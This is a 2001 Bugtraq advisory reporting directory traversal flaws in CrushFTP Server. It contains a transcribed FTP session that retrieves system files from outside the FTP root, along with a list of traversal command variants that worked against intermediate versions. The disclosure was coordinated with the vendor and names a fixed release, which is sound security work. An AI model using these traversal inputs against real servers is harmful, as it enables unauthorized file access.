Home page logo

bugtraq logo Bugtraq mailing list archives

Vulnerabilities in CrushFTP Server
From: joetesta () HUSHMAIL COM
Date: Thu, 3 May 2001 13:13:40 -0800

----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerabilities in CrushFTP Server


CrushFTP Server 2.1.4 is a java ftp server available from
http://www.crushftp.com.  Multiple vulnerabilities exist which allow
users to change directories outside of the ftp root and download files.


The following is an illustration of the problem.  An ftp root of
"c:\directory\directory" was used.

ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK.  Need password.
230 Password OK.  Connected.
ftp> get ../../autoexec.bat
200 PORT command successful.
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful.
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

The vendor issued two versions since I made initial contact to address
additional variations.  The following is a list of vulnerabilities which
affected these intermediate versions (v2.1.5, v2.1.6):

NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat


Upgrade to v2.1.7 at:

    Vendor Status

The program author, Ben Spink, was contacted via <spinkb () mac com> on
Friday, April 20, 2001.  I would like to thank him for taking this
matter seriously and showing extra effort to resolve these problems.

    - Joe Testa

e-mail:   joetesta () hushmail com
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron

----- Begin Hush Signature v1.3 -----
----- End Hush Signature v1.3 -----

This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools

Free, encrypted, secure Web-based email at www.hushmail.com

  By Date           By Thread  

Current thread:
  • Vulnerabilities in CrushFTP Server joetesta (May 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]